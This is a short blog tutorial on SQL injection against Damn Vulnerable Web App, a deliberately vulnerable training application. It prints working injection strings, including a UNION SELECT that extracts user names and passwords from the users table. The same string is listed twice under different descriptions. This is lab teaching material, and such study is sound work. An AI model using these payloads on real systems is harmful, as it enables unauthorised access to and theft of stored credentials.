How to do a SQL injection attack against Damn Vulnerable Web App.

Damn Vulnerable Web App is a PHP web application that is deliberately vulnerable. This is used to learn how to attack websites by exploiting various vulnerabilities in the software. In this example, I am showing you how to use a SQL injection to get information out of the database.

Damn Vulnerable Web App SQL injection.
Damn Vulnerable Web App SQL injection.

This line of code will extract all passwords from the DVWA database.

1' and 1=1 union select user, password from users#

And this simple line will get information about the admin user.

1' and 1=1 #

This will list all users on the system.

1' and 1=1 union select user, password from users#

These commands are a good start if you are messing around with DVWA and help is needed when starting out with DVWA and SQL injection. Setting DVWA to a low security setting seems to be necessary to allow these attacks to work. But these strings do work very well indeed.

No comments have been made. Use this form to start the conversation :)

Leave a Reply